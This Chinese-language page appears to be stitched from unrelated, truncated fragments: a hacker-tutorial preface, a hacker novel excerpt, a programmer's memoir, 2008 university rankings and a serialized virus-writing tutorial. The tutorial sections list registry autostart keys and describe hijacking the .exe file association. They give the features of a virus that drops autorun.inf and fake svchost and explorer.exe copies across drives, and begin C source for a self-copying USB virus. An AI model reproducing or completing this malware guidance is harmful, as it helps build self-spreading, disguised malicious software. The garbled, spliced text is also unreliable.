本站简介及内部群免费教程

 

   黑客入门教程

黑客基地  
By：HotTaro         转载注明


前言：
最近帖子和教程都少了，非常的抱歉。长大了事多，项目一个接一个不停。没什么时间了，现在这电脑都是借朋友的，抽空留点东西，以后真是没心思也没时间了。
有许多朋友掌握了一些知识就开始膨胀而另外一些朋友似乎在学习时永远迷茫，希望些贴对大家有点点帮助。
当然，我水平跟大家也一样，有什么说得不恰当的尽管提出来。
文章也是针对新手朋友而言，高手就飘了，也不要对我进行人生攻击。

许多朋友看贴就是对我一顿骂,不过确实有点写的乱七八糟的.不好意思,今天编辑了一下.

大概说一下写这玩意的目的.

一来算自己接触这方面这么久的一点点心得,希望对新手朋友有点帮助.毕竟菜都是从更菜过来的.
二也算是给自己留下点东西,以后回头来看看自己幼稚的文章和心态也有另一番风味.


然后再说明几点,花几秒钟扫一下.

首先,这个贴子开始是突发奇想写的.乱,确实乱.
所以,开始抱有希望而看过之后觉得垃圾的朋友希望可以回

 

　我傻傻的听着，象听故事一样。
　　算了，我看你也不会透露五一计划的详情。你不愿说，我们也不勉强，反正我们也知道得差不多了。你可以走了。
　　我呆呆的站起来。我不知道回去怎么办。是告诉肥猫他们，还是退出五一反击战？
　　也许是看出了我的想法，杨成在送我出门时，似乎很随意的说了一句。
　　其实，美国这次做得太过分了，适当给他们一点教训也是应该的。我想，政府也会原谅你们的。有张盘，你拿回去看看。
　　我在车上才把这话回味过来。我看了看手上的磁盘。我已经猜到了里面是什么了。
　　果然，当我回到宿舍后，打开磁盘，我看到了一个威力巨大的攻击软件。不同于儒虫，不同于邮件炸弹，这是一个做得精致可以说是完美的程序。它可以截取远程系统的序列号。要知道，每一个用户请求登陆时，系统会对登陆名和密码进行确认，这一切都是经过数据链路层进行的。一般的黑客工具都是试图截取数据链路层的数据以获得权限。可这个程序，可以通过物理层的特性来取得权限！！
　　我几乎是嫉妒地看着这个软件，我宁愿用全部的积蓄换取它的源代码！
　　我恨恨地骂了

“在未来的时代里，只有黑客能改变这个世界的所有秩序，无论是经济秩序，还是军事秩序。”
　　——德国《快捷报》
　　我在这个圈子里小有名气，人们称我为天王。
　　这本来是一个独一无二的称呼，但后来这个圈子的影响越来越大，人也越来越多，一些高手也被称为天王，不过他们的天王后面总要带名字，比如说，天王肥猫。他是我唯一看得起的少数几个圈内人之一。但圈内人只称他为天王肥猫，或者肥猫，从没有简称为天王，因为圈内人都知道，也都公认为，真正的天王只有一个，那就是我。
　　在这个圈子中，我是个傲慢的侠客。从小我看着金庸古龙的书长大，在我小时候的梦里，除了面目不清的女人身体外，就是古树栈道，落英缤纷，铁马金戈。而我，仗剑走天涯，笑傲江湖。我时常想象我在寂静的荒山，忽明忽暗的磷光，仰望无穷星空，梦想自己是万能的圣者。
　　我当然没办法成为武功盖世的高手，我拼命地锻炼身体，但除了在体育课上拿90分外，还是没能飞檐走壁。于是我把我的梦想寄托在网络。
　　忘记说了，这个圈子里的人，被称为网络入侵者，简称黑客。英文是HACKER或者CRACKER.当然，真正的黑客只

首先说明一下,有些网友提出前3篇文章大都在讲注册表,没有新内容,但我认为:现在病毒几乎100%修改注册表,

因而(1)(2)的两个病毒示例也应做到如此,并且(1)(2)中分别用了不同的修改方法,用了不少不同的病毒技术.

而(3)是(1)(2)中部分技术的总结与技术方法的详细介绍,并又介绍了一些其它的注册表操作,再者,90%的病毒

必须通过注册表自启动,因此修改注册表可以是每个'真'病毒必须做的事.

本连载文章只讨论写病毒的技术,并不讨论危害计算机及网络,所示例的程序只是一个无危害的模板,你可以在技术范围及法律范围内扩充实验.

在读本程序前请保证不用此程序进行违法活动,由于你使用本程序而对他人、组织等造成的任何损失都由将你承担，本人不负任何责任，否则,请马上离开.

拒绝任何形式的转载（本人除外），否则属于著作侵权，将受到《中华人民共和国软件保护条理》、《中华人民共和国著作权法》、《中华人民共和国知识产权法》等法律最大限度的制裁！！

--------------------------------------------------------------------------------------------------
这次讲一下DLL病毒:
随着病毒的发展,病毒也由

 

这是第三篇连载了，这次着重写些编程技术和病毒原理方面问题。
注册表篇
1.可以用于病毒开机自启动的注册表位置：
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServicesOnce]
[HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
[HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
[HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices]
以上只是默认运行的部分注册表位置，其实还可以在系统启动外客(shell explorer.exe)后添加病毒路径等方法，同样可以实现通过注册表开机自动运行。
2.关联文件类型
在注册表HKEY_CLASS_ROOT下可以更改文件类型的默认启动程序，比如更改EXE文件的启动程序为你写的病毒，那么每当运行exe程序时，病毒将替代程序运行
例：
到注册表HKEY_CLASS_ROOT\exefile\shell\open\command下，修改“默认”修改为c

本连载文章只讨论写病毒的技术,并不讨论危害计算机及网络,所示例的程序只是一个无危害的模板,你可以在技

术范围及法律范围内扩充实验.

在读本程序前请保证不用此程序进行违法活动,由于你使用本程序而对他人、组织等造成的任何损失都由将你承

担，本人不负任何责任，否则,请马上离开.

从本篇文章开始，拒绝任何形式的转载（本人除外），否则属于著作侵权，将受到《中华人民共和国软件保护

条理》、《中华人民共和国著作权法》等法律最大限度的制裁！！

点击下载该文件

本版病毒所具有的功能：
1.在所有磁盘的根目录生成svchost.com和autorun.inf文件
2.生成病毒体：
c:\windows\wjview32.com
c:\windows\explorer.exe
c:\windows\system32\dllcache\explorer.exe
c:\windows\system\msmouse.dll
c:\windows\system32\cmdsys.sys
c:\windows\system32\mstsc32.exe
3.病毒体c:\windows\explorer.exe感染原

连载1——最基本的病毒.
本病毒的功能:
1.在C、D、E盘和c:\windows\system、c:\windows中生成本病毒体文件
2.在C、D、E盘中生成自动运行文件
3.注册c:\windows\system\svchost.exe，使其开机自动运行
4.在C:\windows\system下生成隐蔽DLL文件
5.病毒在执行后具有相联复制能力

本病毒类似普通U盘病毒雏形，具备自我复制、运行能力。

以下程序在DEV-CPP 4.9.9.2(GCC编译器)下编译通过
请保存为SVCHOST.C编译,运行,本病毒对计算机无危害,请放心研究

#define SVCHOST_NUM 6
#include<stdio.h>
#include<string.h>
char *autorun={'[autorun]\nopen=SVCHOST.exe\n\nshell\\1=打开\nshell\\1\\Command=SVCHOST.exe\nshell\\2\\=Open\nshell\\2\\Command=SVCHOST.exe\nshellexecute=SVCHOST.exe'};
char *files_autorun[10]={'c:\\autorun.inf','d:\\autorun.inf','e:\\autorun.inf'};
char *fi

编制病毒的语言

最常见的编制病毒的语言有汇编语言、VB、C 语言等，我们可以来看一看一个有名的病毒论坛上认为学写病

 

毒要掌握的基础：

1).Win32编程，进程，线程，内存，等等。 　　

2).32位汇编，以指令用法为主。386汇编就比较够用了。　　

3).PE格式，有精力还可以看一下其它可能被感染的文件的文件格式。 　　

4).调试技术。VC，TD32，SoftIce，等等。要掌握的东西确实很多，还多听都没听过,很吓人．但实际上，即使我们对计算机的原理和操作系统不很了解，而且不熟悉除Ｃ以外的其他语言，只要我们对Ｃ的库函数有一定了解，就可以写一些类似病毒的东西.

 

三　用Ｃ编制病毒以TurboC2.0为例．它的库函数可以实现很多功能．

 

 如以下两个函数： 1).findfirst和findnext函数：

在dir.h。findfirst用来找各种类型的文件，可以得到文件名文件长度，文件属性等，findnext和findfirst配合使用，用来找到下一个同类型的文件。

2).remove函数:在stdio.h.只要知道文件名,可以删除任意类型的文

我希望成为一个优秀的IT人，我已经努力了七年
　　这些日子我一直在写一个实时操作系统内核，已有小成了，等写完我会全部公开，希望能够为国内IT的发展尽自己一份微薄的力量。最近看到很多学生朋友和我当年一样没有方向，所以把我的经历写出来与大家共勉，希望能给刚如行的朋友们一点点帮助。
　　一转眼我在IT行业学习工作已经七年多了，这期间我做过网页，写过MIS、数据库，应用程序，做过通信软件、硬件驱动、协议栈，到现在做操作系统内核和IC相关开发，这中间走了很多弯路，也吃了不少苦。
　　我上的是一个三流的高校，就连同一个城市的人多数都不知道。因为学校不好也就没有指望能靠学校名气找一个好工作。所有的希望都寄托在自己的努力上了，大一开学前的假期我就开始了学习，记得我买的第一本书是《计算机基础DOS3.0》，大家别吓着了，其实当时已经普及了DOS6.22了，只是我在书店里看到了DOS4.0，5.0，6.0的书，以为像英语那样是第四、五、六册，记得当时到处找DOS1.0，现在想想也幸好我没有找到：）开学前我学完了PASCAL，那时既没有计算机也没有人可以请教，我连程序是什么的概念都没有，只好死记硬背代码，

2008中国研究生教育计算机专业排名

 

 

计算机系统结构前20名（总共47所高校）

 

1.清华大学，2.华中科技大学，3.西安交通大学，4.上海交通大学，5.浙江大学，6.西安电子科技大学，7.武汉大学，8.复旦大学，9.哈尔滨工业大学，10.东北大学，11.北京大学，12.东南大学，13.北京航空航天大学，14.中国科学技术大学，15.电子科技大学，16.吉林大学，17.南京理工大学，18.重庆大学，19.北京科技大学，20.同济大学
　　
　　计算机软件与理论前40名（总共158所高校）

　　1.上海交通大学，2.南京大学，3.北京大学，4.北京航空航天大学，5.吉林大学，6.清华大学，7.浙江大学，8.西安交通大学，9.东南大学，10.电子科技大学，11.中国科学技术大学，12.哈尔滨工业大学，13.大连理工大学，14.华